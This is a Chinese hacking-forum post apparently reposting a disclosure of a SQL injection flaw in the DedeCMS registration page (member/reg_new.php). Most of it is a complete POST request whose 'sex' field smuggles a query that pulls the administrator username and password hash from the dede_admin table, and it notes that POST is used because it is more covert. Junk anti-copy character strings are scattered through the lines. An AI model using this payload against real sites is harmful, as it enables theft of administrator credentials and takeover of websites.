找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1936|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞+ y, t# f2 {) ^; {5 ]' m
简要描述:/ L* L+ @7 b# o& T

. k9 J. v, d2 [4 Y  N需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.6 ~8 M" \* g% C; E
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.8 W% H- Q6 ^4 v) g
详细说明:跟这个漏洞
" }8 q7 }* w. X9 ~5 Q' G & d7 Q" o/ l9 V+ Q0 @5 U0 s7 r
WooYun: Dedecms SQL注射导致审核机制绕过漏洞: a0 F  S1 @: M- o- t9 E
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
5 O( p& K# r& ^0 W, h, e7 YPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
# o: R- S$ I+ e! [9 D( J9 D & \; z3 m9 a1 a2 C; ^; ?( j& w0 Y0 m: i
www.political-security.com/member/reg_new.php- f) l6 M- o, O+ a( R  b# ^: c
, L3 R9 s6 f% d4 a/ L2 a
POST
  |4 D( T; D" e+ ~+ \/ n, j - B# z" R. E" ^6 G. H( @6 }( G
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
! N! L9 w. `! m9 Xuserid=c4rp3nt3r&uname=c4rp3nt3r
& d! x/ M8 N) M* Z! k9 c&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss. R8 J9 {7 L4 B6 b2 R" y* p
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,7 h+ M. c) d& e& t
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
6 r7 C4 g) W( w2 g  v%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表